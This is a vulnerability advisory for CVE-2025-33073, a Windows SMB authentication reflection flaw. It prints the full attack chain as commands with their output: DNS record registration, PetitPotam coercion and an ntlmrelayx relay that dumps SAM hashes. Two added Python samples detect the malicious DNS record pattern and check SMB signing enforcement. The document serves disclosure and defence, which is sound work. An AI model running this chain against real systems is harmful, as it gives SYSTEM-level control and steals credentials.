Windows Authenticated Remote Command Execution
21/07/2025
Product
Windows
Severity
Critical
Fixed Version(s)
KB5060525, KB5060526, KB5060531, KB5060533, KB5060841, KB5060842, KB5060998, KB5060999, KB5061010, KB5061018, KB5061026, KB5061036, KB5061059, KB5061072, KB5061078
Affected Version(s)
All versions of Windows
CVE Number
CVE-2025-33073
Authors
Description
Presentation
Windows is a product line of proprietary graphical operating systems developed and marketed by Microsoft.
Issue(s)
A missing check in the Windows SMB client allows an authenticated attacker to perform an authentication reflection attack and compromise any Windows machine that does not enforce SMB signing.
Timeline
| Date | Description |
|---|---|
| 2025.03.12 | Advisory sent to MSRC |
| 2025.04.08 | Vulnerability acknowledged by Microsoft |
| 2025.05.30 | Vulnerability assigned CVE-2025-33073 |
| 2025.06.10 | Patch published by Microsoft in June 2025 Patch Tuesday |
| 2025.07.21 | Public release of the advisory |
Technical details
Authenticated Remote Command Execution
Description
By registering a DNS record that points to a controlled IP address and whose name contains marshalled target information, coercing a machine into authenticating to that record, and relaying the authentication back to the same machine, it is possible to execute remote commands as SYSTEM.
To compromise the machine SRV1, the DNS record srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA must be registered. By default, any authenticated user in the domain can register a DNS record:
$ dnstool.py -u 'ASGARD.LOCAL\loki' -p loki 192.168.56.10 -a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.56.3
[-] Adding new record
[+] LDAP operation completed successfully
Then, the machine must be coerced into authenticating to the previously added record (which points to a controlled IP address):
$ PetitPotam.py -u loki -p loki -d ASGARD.LOCAL srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA SRV1.ASGARD.LOCAL
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Finally, the authentication is relayed back to the original machine (authentication reflection):
# ntlmrelayx.py -t SRV1.ASGARD.LOCAL -smb2support
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.56.14, attacking target smb://SRV1.ASGARD.LOCAL
[*] Authenticating against smb://SRV1.ASGARD.LOCAL as / SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0c10b250470be78cbe1c92d1b7fe4e91
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:df3c08415194a27d27bb67dcbf6a6ebc:::
user:1000:aad3b435b51404eeaad3b435b51404ee:57d583aa46d571502aad4bb7aea09c70:::
[*] Done dumping SAM hashes for host: 192.168.56.14
As seen in the output above, the relay succeeded. Moreover, since the relayed identity is SYSTEM, privileged actions can be performed over SMB, such as dumping the registry hives remotely, which amounts to a full compromise of the machine.
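The chain above leaves one artefact a defender can hunt for before any coercion happens: a DNS A record whose name is a real host name followed by a marshalled target-information blob, pointing at an address that does not belong to that host. The following added example (not part of the advisory) scans an exported zone for that pattern. The marker `1UWhRCA` is the start of the suffix in the advisory's own record name; the 32-character alphanumeric-suffix threshold is a heuristic I chose, and the host inventory and record list are constructed sample data.

```python
import re
from dataclasses import dataclass, field

# Start of the marshalled target-information suffix as it appears in the
# advisory's record name (srv1 + "1UWhRCAAAA..."). DNS names are
# case-insensitive, so everything is compared in lower case.
MARSHALLED_TARGETINFO_MARKER = "1uwhrca"
# Heuristic threshold (my choice): a legitimate host name rarely carries a
# purely alphanumeric tail this long after another real host's name.
MIN_SUSPICIOUS_SUFFIX = 32
ALNUM_RE = re.compile(r"[a-z0-9]+\Z")


@dataclass
class Finding:
    record: str
    impersonated_host: str
    address: str
    reasons: list[str] = field(default_factory=list)


def find_suspicious_records(records, known_hosts):
    """records: iterable of (name, rtype, data) as exported from the AD zone.
    known_hosts: {hostname: {legitimate_ip, ...}} from the asset inventory."""
    hosts = {h.lower(): ips for h, ips in known_hosts.items()}
    findings = []
    for name, rtype, data in records:
        if rtype.upper() != "A":
            continue
        lname = name.lower()
        if lname in hosts:
            continue  # the host's own record, nothing to impersonate
        # Longest inventory host name that is a strict prefix of this record.
        matches = [h for h in hosts if lname.startswith(h) and len(lname) > len(h)]
        if not matches:
            continue
        host = max(matches, key=len)
        suffix = lname[len(host):]
        reasons = []
        if suffix.startswith(MARSHALLED_TARGETINFO_MARKER):
            reasons.append("suffix starts with the marshalled target-info marker")
        if len(suffix) >= MIN_SUSPICIOUS_SUFFIX and ALNUM_RE.match(suffix):
            reasons.append(f"{len(suffix)}-char alphanumeric suffix after host name")
        if not reasons:
            continue  # e.g. "srv10" or "srv1-backup" next to a known "srv1"
        if data not in hosts[host]:
            reasons.append(f"resolves to {data}, not an address of {host}")
        findings.append(Finding(name, host, data, reasons))
    return findings


# Constructed inventory and zone export; only the long record is taken from the advisory.
KNOWN_HOSTS = {"SRV1": {"192.168.56.14"}, "SRV10": {"192.168.56.20"}, "DC01": {"192.168.56.10"}}
SAMPLE_RECORDS = [
    ("SRV1", "A", "192.168.56.14"),
    ("SRV10", "A", "192.168.56.20"),
    ("DC01", "A", "192.168.56.10"),
    ("srv1-backup", "A", "192.168.56.15"),
    ("srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA", "A", "192.168.56.3"),
]


def run_demo():
    return find_suspicious_records(SAMPLE_RECORDS, KNOWN_HOSTS)


if __name__ == "__main__":
    for f in run_demo():
        print(f"[!] {f.record} -> {f.address} (impersonates {f.impersonated_host})")
        for r in f.reasons:
            print(f"    - {r}")
```

The inventory check is what separates a true positive from noise: `srv10` and `srv1-backup` both start with `srv1` but carry short or hyphenated suffixes and are left alone, while the advisory's record is flagged on all three counts (marker, long alphanumeric tail, foreign address). Feed it the output of a zone export and the same inventory you use for patch tracking.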
The complete analysis of the vulnerability can be found in the associated blogpost.
Impact
An authenticated user can execute remote commands as SYSTEM on any Windows machine that does not enforce SMB signing.
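Whether a given host is exposed comes down to the SecurityMode a server advertises when a client connects. The following added example (not part of the advisory) parses an SMB2 NEGOTIATE response, with or without the NetBIOS session header used on TCP port 445, and reports whether signing is merely enabled or actually required. Field layout and flag values follow MS-SMB2 (header in 2.2.1.2, NEGOTIATE response in 2.2.4); the responses it tests against are constructed in `build_negotiate_response`, not captured traffic.

```python
import struct

SMB2_PROTOCOL_ID = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002

# SMB2 header: ProtocolId, StructureSize, CreditCharge, Status, Command, Credits,
# Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature (64 bytes).
HEADER_FMT = "<4sHHIHHIIQIIQ16s"
# NEGOTIATE response fixed part: StructureSize, SecurityMode, DialectRevision,
# NegotiateContextCount, ServerGuid, Capabilities, MaxTransactSize, MaxReadSize,
# MaxWriteSize, SystemTime, ServerStartTime, SecurityBufferOffset,
# SecurityBufferLength, NegotiateContextOffset (64 bytes before the buffer).
NEGOTIATE_FMT = "<HHHH16sIIIIQQHHI"


def parse_negotiate_response(data: bytes) -> dict:
    """Extract dialect and signing flags from a raw SMB2 NEGOTIATE response."""
    # Direct TCP transport prefixes each message with a 4-byte NetBIOS session header.
    if len(data) >= 8 and data[0] == 0 and data[4:8] == SMB2_PROTOCOL_ID:
        data = data[4:]
    if len(data) < struct.calcsize(HEADER_FMT) + struct.calcsize(NEGOTIATE_FMT):
        raise ValueError("message too short for an SMB2 NEGOTIATE response")
    (proto, hdr_size, _credit_charge, status, command, _credits, flags,
     _next, _msg_id, _reserved, _tree_id, _session_id, _sig) = struct.unpack_from(HEADER_FMT, data, 0)
    if proto != SMB2_PROTOCOL_ID or hdr_size != 64:
        raise ValueError("not an SMB2 message")
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a server NEGOTIATE response")
    if status != 0:
        raise ValueError(f"NEGOTIATE failed with NTSTATUS 0x{status:08x}")
    (struct_size, security_mode, dialect, _ctx_count, _guid, capabilities,
     _max_tx, _max_rd, _max_wr, _sys_time, _start_time, _sec_off, _sec_len,
     _ctx_off) = struct.unpack_from(NEGOTIATE_FMT, data, 64)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": dialect,
        "capabilities": capabilities,
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def signing_verdict(info: dict) -> str:
    """Map the flags to the condition the advisory's impact statement depends on."""
    if info["signing_required"]:
        return "signing required: unsigned sessions are rejected"
    return "signing not enforced: unsigned sessions are accepted (precondition of the advisory)"


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed sample response for offline testing; not a real capture."""
    header = struct.pack(HEADER_FMT, SMB2_PROTOCOL_ID, 64, 1, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack(NEGOTIATE_FMT, 65, security_mode, dialect, 0, b"\x00" * 16,
                       0x0000007F, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body + b"\x00"  # one-byte empty security buffer


if __name__ == "__main__":
    for mode in (SMB2_NEGOTIATE_SIGNING_ENABLED,
                 SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED):
        info = parse_negotiate_response(build_negotiate_response(mode))
        print(f"dialect 0x{info['dialect']:04x}: {signing_verdict(info)}")
```

Every SMB2 server sets SIGNING_ENABLED, so that bit alone says nothing; only SIGNING_REQUIRED means the host would refuse the unsigned session a relayed authentication produces. Run the parser over the negotiate responses in a capture of your own servers to find hosts that still need the `RequireSecuritySignature` setting enforced alongside the June 2025 updates listed above.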